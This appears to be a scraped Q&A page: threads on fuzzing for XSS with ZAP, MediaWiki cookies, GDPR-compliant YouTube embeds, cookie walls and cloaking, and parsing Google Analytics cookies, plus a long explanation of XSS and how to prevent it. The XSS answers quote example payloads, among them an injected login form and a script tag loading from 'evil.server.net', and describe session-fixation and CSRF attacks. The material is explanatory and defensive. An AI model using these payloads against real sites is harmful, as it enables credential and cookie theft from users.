Issues fuzzing parameters on a website to search for cross-site scripting (XSS) vulnerabilities - xss

I am using OWASP's Zed Attack Proxy (ZAP) to fuzz parameters on a website and search for cross-site scripting (XSS) vulnerabilities. After watching a YouTube video (http://www.youtube.com/watch?v=rmbi-VbIK6I), I am trying to reproduce it, but while fuzzing I receive only a few responses compared to that video, and the scripts are not displayed. Above all, how can I identify which script hit by looking at the response code? I am very new to this field. I am posting screenshots to show the difference. Please help me out.
My output:
Video's output:

Related

Mediawiki:Cookies in general

I have a general and perhaps simple/stupid-sounding question about MediaWiki (MW): does MW use cookies?
There is not a single article or manual page about this topic. Of course the MW website has a Cookie Statement page (and Wikipedia links to the same one), which says they use different types of cookies and even tracking pixels (another topic you can't find anything about).
If I log in on my freshly installed wiki and look for cookies in the meantime, the browser doesn't show me any cookie from my site. But if I log in on Wikipedia et al., cookies are set.
I did a lot of searching on this question and on whether it is possible to control the use of cookies, but couldn't find any detailed article. Because of the GDPR I would like to understand how this works in MW, not just copy/paste a cookie statement for my wiki's visitors.
This is what I've found so far (but it didn't help at all):
Manual:SessionManager and AuthManager
Manual:Configuration Settings
Requests for comment/Survey Cookies/Local Storage on Wikimedia
Extension:CookieWarning
GDPR (General Data Protection Regulation) and MediaWiki software
So if possible, please tell me more than "MW is using cookies."
Thanks in advance :)
MediaWiki does use cookies, at least session cookies. Session cookies are technically necessary, though, so you generally don't need consent for them.
Extensions can bring in more cookies; analytics tools in particular set tracking cookies.

YouTube and GDPR compliance for videos embedded on a website

I came to know that even embedding YouTube videos on a website is affected by the GDPR; even for this we need user consent. There is not much I can find on the internet about how to make embedded YouTube videos GDPR compliant and how to obtain user consent for them.
After digging for a few days I found the following link, which explains one approach:
https://foliovision.com/support/fv-wordpress-flowplayer/requests-and-feedback/youtube-and-gdpr
The following link from Google lets us use a no-cookie option, but is this GDPR compliant? https://www.youtube-nocookie.com/embed/MjZxCbMQmXg
Is there any easy way of getting user consent for all such third-party tools?
I'm currently working with a very similar issue.
The solution I have working so far is like this:
Install the Cookie Consent plugin from https://privacypolicies.com/cookie-consent/ and configure it
Wrap YouTube embeds in this sort of PHP:
if (isset($_COOKIE['cookie_consent_level']) &&
    $_COOKIE['cookie_consent_level'] == "targeting-cookies") {
    // If we are allowed to use targeting cookies,
    // include the Youtube/FB/Google code.
    print $youtube_embed_code;
    print $google_retargeting_code;
    print $facebook_pixel_code;
}
What that provides is the embed loading from the second page view onward (within the 12-month consent window). If your default cookie setting is the most permissive one, e.g. targeting-cookies, then all subsequent page views on your site for that visitor will include the appropriate embeds.
I'm close to getting something working on first page load, after approval is sought, but not quite there yet.
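The same gating can be sketched client-side. This is a minimal sketch, assuming the consent plugin stores its choice in a `cookie_consent_level` cookie as in the PHP above; the function names and placeholder markup are illustrative, not part of the plugin's API:

```javascript
// Parse a raw cookie string (document.cookie) into a name -> value map.
function parseCookies(cookieString) {
  const jar = {};
  for (const pair of cookieString.split(';')) {
    const idx = pair.indexOf('=');
    if (idx === -1) continue;
    const name = pair.slice(0, idx).trim();
    jar[name] = decodeURIComponent(pair.slice(idx + 1).trim());
  }
  return jar;
}

// Only return the embed markup when targeting cookies were accepted;
// otherwise return a placeholder asking for consent.
function renderEmbed(cookieString, embedHtml) {
  const jar = parseCookies(cookieString);
  if (jar['cookie_consent_level'] === 'targeting-cookies') {
    return embedHtml;
  }
  return '<p>Accept targeting cookies to view this video.</p>';
}
```

In a browser you would call `renderEmbed(document.cookie, …)` after the consent plugin has set its cookie, and inject the result into the page.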
This plugin helped: http://wordpress.org/plugins/youtube-embed-plus/
Improved GDPR compliance options: YouTube no cookie, YouTube API restrictions, GDPR consent mode
To see how it works, without having to first download the plugin, I suggest watching this video: https://www.youtube.com/watch?v=lm_HIic6obw
Basically, there's a "preload" message displayed until the site visitor accepts the YouTube.com connection and cookies.

Cookie wall and content cloaking

To comply with the European cookie law, we need to implement a cookie wall. But search engines should be able to see and index the actual page content, not the cookie wall.
Searching online, I found that many people recommend checking the user agent, feeding the actual content to bots and crawlers, and showing the cookie wall to real users. Popular WordPress cookie wall plugins are also implemented this way, distinguishing bots and crawlers from real users.
My question is: does Google count this as content cloaking and penalize the SEO ranking or not? Or is there another way to implement a cookie wall without affecting SEO ranking?
Cloaking is a search engine optimization (SEO) technique in which the content presented to the search engine spider is different from that presented to the user's browser. This is done by delivering content based on the IP addresses or the User-Agent HTTP header of the user requesting the page.
Cloaking takes a user to other sites than he or she expects by disguising those sites' true content. During cloaking, the search engine spider and the browser are presented with different content for the same Web page. HTTP header information or IP addresses assist in sending the wrong Web pages. Searchers will then access websites that contain information they simply were not seeking, including pornographic sites. Website directories also offer up their share of cloaking techniques.
Many of the larger search engine companies oppose cloaking because it frustrates their users and does not comply with their standards. In the search engine optimization (SEO) industry, cloaking is considered to be a black hat technique that, while used, is frowned on by most legitimate SEO firms and Web publishers. Getting caught cloaking can result in huge penalties from the search engines, including being removed from the index altogether.
So, yeah, this counts as cloaking.
Put the cookie disclaimer in an <aside> element. Make sure you initialise it with a small JavaScript shim for old Internet Explorer, since <aside> is HTML5-only. Google will generally ignore such elements based on their content, position and relevance to the rest of the page.

Parsing __utmz tracking cookie to get referral

I use Google Analytics on my site, and I want to read the __utmz cookie to get the referring link. I did some research and wrote this code:
$refer = explode('utmcsr=', $_COOKIE['__utmz']);
if (count($refer) > 1) $refer = explode('|', $refer[1]);
$refer = addslashes($refer[0]);
The problem is, this does not always work; sometimes I get junk as the result. What am I doing wrong? Does anyone have a good description of this cookie?
Check my Google Analytics Cookie Parser.
Google Analytics PHP Cookie Parser is a PHP Class that you can use to obtain data from GA cookies such as campaign, source, medium, etc. You can use this parser to get this data on your contact forms or CRM.
Just updated to version 1.2 with minor bugfixes and more info, such as the number of pages viewed in the current visit.
You could use $_SERVER['HTTP_REFERER'] to get the Referer.
Overall it is a bad idea to rely on other people's cookies for data unless you know exactly how they work and when they change, or you use an API that THEY have made available.
Let's say Google decides to revamp the cookie altogether so that the referrer information is no longer in it; your system would break. It is best to get data directly from your own sources rather than someone else's.
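For reference, the __utmz value has the shape `<hash>.<timestamp>.<session>.<campaign>.utmcsr=google|utmccn=(organic)|utmcmd=organic`, where utmcsr is the source. A defensive parser sketch (the field names utmcsr/utmccn/utmcmd are Google Analytics' own; the function name is illustrative):

```javascript
// Extract the utmcsr/utmccn/utmcmd... fields from a raw __utmz value.
// Returns an empty object when the value is absent or malformed,
// instead of producing junk like the snippet in the question.
function parseUtmz(utmz) {
  const fields = {};
  if (typeof utmz !== 'string') return fields;
  const start = utmz.indexOf('utmcsr=');
  if (start === -1) return fields;
  for (const part of utmz.slice(start).split('|')) {
    const idx = part.indexOf('=');
    if (idx === -1) continue;
    fields[part.slice(0, idx)] = part.slice(idx + 1);
  }
  return fields;
}
```

The key difference from the snippet in the question is the explicit fallback: when `utmcsr=` is missing, you get an empty object rather than the whole cookie string.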

What is the general concept behind XSS?

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications which enables malicious attackers to inject client-side script into web pages viewed by other users. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same-origin policy. Cross-site scripting carried out on websites accounted for roughly 80% of all security vulnerabilities documented by Symantec as of 2007.
Okay, so does this mean that a hacker crafts some malicious JS/VBScript and delivers it to an unsuspecting victim visiting a legitimate site which has unescaped inputs?
I mean, I know how SQL injection is done....
I particularly don't understand how JS/VBScript can cause so much damage! I thought they only run within browsers, but apparently the damage ranges from keylogging to cookie stealing and trojans.
Is my understanding of XSS correct? If not, can someone clarify?
How can I prevent XSS from happening on my websites? This seems important; 80% of security vulnerabilities means it's an extremely common way to compromise computers.
As the answers on how XSS can be malicious are already given, I'll only answer the following question left unanswered:
How can I prevent XSS from happening on my websites?
To prevent XSS, you need to HTML-escape any user-controlled input when it is about to be redisplayed on the page. This includes request headers, request parameters and any stored user-controlled input that is served from a database. Especially <, >, " and ' need to be escaped, because they can malform the surrounding HTML code where the input is redisplayed.
Almost any view technology provides built-in ways to escape HTML (or XML, which is also sufficient) entities.
In PHP you can do that with htmlspecialchars(). E.g.
<input name="foo" value="<?php echo htmlspecialchars($foo); ?>">
If you need to escape single quotes with this as well, you'll need to supply the ENT_QUOTES argument; see also the PHP documentation linked above.
In JSP you can do that with JSTL <c:out> or fn:escapeXml(). E.g.
<input name="foo" value="<c:out value="${param.foo}" />">
or
<input name="foo" value="${fn:escapeXml(param.foo)}">
Note that you actually don't need to escape against XSS during request processing, only during response processing. Escaping during request processing is unnecessary and may malform the user input sooner or later (and as the site admin you'd also like to know what the user in question actually entered, so you can take social action if necessary). With regard to SQL injection, escape during request processing only at the moment the data is about to be persisted in the database.
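The same store-raw, escape-on-output rule in a JavaScript sketch; the `escapeHtml` helper below mirrors what `htmlspecialchars($s, ENT_QUOTES)` does in the PHP example (the variable names are illustrative):

```javascript
// Escape the five characters that can break out of an HTML context,
// equivalent to PHP's htmlspecialchars with ENT_QUOTES.
function escapeHtml(s) {
  return s
    .replace(/&/g, '&amp;')   // must run first, so entities aren't double-escaped
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#039;');
}

// Store the input raw...
const stored = '<script>alert(1)</script>';
// ...and escape only at the moment it is written into the page.
const rendered = '<td>' + escapeHtml(stored) + '</td>';
```

Because escaping happens only on output, the database still holds exactly what the user typed, and the same stored value can later be emitted safely into other contexts.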
Straightforward XSS
I find Google has an XSS vulnerability.
I write a script that rewrites a public Google page to look exactly like the actual Google login.
My fake page submits to a third party server, and then redirects back to the real page.
I get google account passwords, users don't realize what happened, Google doesn't know what happened.
XSS as a platform for CSRF (this supposedly actually happened)
Amazon has a CSRF vulnerability where an "always keep me logged in" cookie allows you to flag an entry as offensive.
I find an XSS vulnerability on a high traffic site.
I write a JavaScript that hits up the URLs to mark all books written by gay/lesbian authors on Amazon as offensive.
To Amazon, they are getting valid requests from real browsers with real auth cookies. All the books disappear off the site overnight.
The internet freaks the hell out.
XSS as a platform for Session Fixation attacks
I find an e-commerce site that does not reset its session after a login (like any ASP.NET site), allows the session ID to be passed in via the query string or a cookie, and stores auth info in the session (pretty common).
I find an XSS vulnerability on a page on that site.
I write a script that sets the session ID to the one I control.
Someone hits that page, and is bumped into my session.
They log in.
I now have the ability to do anything I want as them, including buying products with saved cards.
Those three are the big ones. The problem with XSS, CSRF, and Session Fixation attacks are that they are very, very hard to track down and fix, and are really simple to allow, especially if a developer doesn't know much about them.
I don't get how JS/VBScript can cause so much damage!
Ok. Suppose you have a site served from http://trusted.server.com/thesite. Let's say this site has a search box, and when you search, the URL becomes: http://trusted.server.com/thesite?query=somesearchstring.
If the site decides not to process the search string and outputs it in the result, like 'Your search "somesearchstring" didn't yield any results', then anybody can inject arbitrary HTML into the site. For example:
http://trusted.server.com/thesite?query=<form action="http://evil.server.net">username: <input name="username"/><br/>password: <input name="pw" type="password"/><br/><input type="submit"/></form>
So, in this case, the site will dutifully show a fake login form on the search results page, and if the user submits it, it will send the data to the evil untrusted server. But the user doesn't see that; especially if the URL is really long, they will just see the first bit and assume they are dealing with trusted.server.com.
Variations to this include injecting a <script> tag that adds event handlers to the document to track the user's actions, or send the document cookie to the evil server. This way you can hope to bump into sensitive data like login, password, or credit card data. Or you can try to insert a specially styled <iframe> that occupies the entire client window and serves a site that looks like the original but actually originates from evil.server.com. As long as the user is tricked into using the injected content instead of the original, the security's comprompised.
This type of XSS is called reflected and non-persistent. Reflected because the URL is "reflected" directly in the response, and non-persistent because the actual site is not changed; it just serves as a pass-through. Note that something like HTTPS offers no protection whatsoever here: the site itself is broken, because it parrots the user input via the query string.
The trick now is to get unsuspecting users to trust any links you give them. For example, you can send them an HTML email with an attractive-looking link which points to the forged URL. Or you can spread it on wikis, forums etc. I am sure you can appreciate how easy it really is; it's just a link, what could go wrong, right?
Sometimes it can be worse. Some sites actually store user-supplied content. Simple example: comments on a blog or threads on a forum. Or it may be more subtle: a user profile page on a social network. If those pages allow arbitrary html, esp. script, and this user-supplied html is stored and reproduced, then everybody that simply visits the page that contains this content is at risk. This is persistent XSS. Now users don't even need to click a link anymore, just visiting is enough. Again the actual attack consists of modifying the page through script in order to capture user data.
Script injection can be blunt, for example, one can insert a complete <script src="http://evil.server.net/script.js"> or it may be subtle: <img src="broken" onerror="...quite elaborate script to dynamically add a script tag..."/>.
As for how to protect yourself: the key is to never output user input unescaped. This may be difficult if your site revolves around user-supplied content with markup.
Imagine a web forum. An XSS attack could be that I make a post with some javascript. When you browse to the page, your webpage will load and run the js and do what I say. As you have browsed to the page and most likely are logged in, my javascript will do anything you have privileges to do, such as make a post, delete your posts, insert spam, show a popup etc.
So the real concept with XSS is the script executes in your user context, which is a privilege escalation. You need to be careful that anywhere in your app that receives user input escapes any scripts etc. inside it to ensure that an XSS can't be done.
You have to watch out for secondary attacks. Imagine I put a malicious script into my username. That might go into the website unchecked and then be written back out unchecked, but then any page that is viewed with my username on it would actually execute the malicious script in your user context.
Escape user input. Don't roll your own code to do this. Check everything going in, and everything coming out.
XSS attacks are mostly phishing-related. The problem is that a site a customer trusts might be injected with code that leads to a site made by the attacker for a certain purpose, stealing sensitive information, for example.
So in XSS attacks the intruder does not get into your database and doesn't mess with it. He is playing on the customer's sense that this site is safe and every link on it points to a safe location.
This is just the first step of the real attack: to bring the customer into the hostile environment.
I can give you a brief example. If a banking institution puts a shoutbox on its page, for example, and does not prevent XSS attacks, I can shout "Hey, come to this link and enter your passwords and credit card number for a security check!"... and you know where that link will lead, right?
You can prevent XSS attacks by making sure you don't display anything on your page that comes from users' input without escaping HTML tags. The special characters should be escaped so that they don't interfere with the markup of your HTML pages (or whatever technology you use). There are lots of libraries that provide this, including the Microsoft AntiXSS library.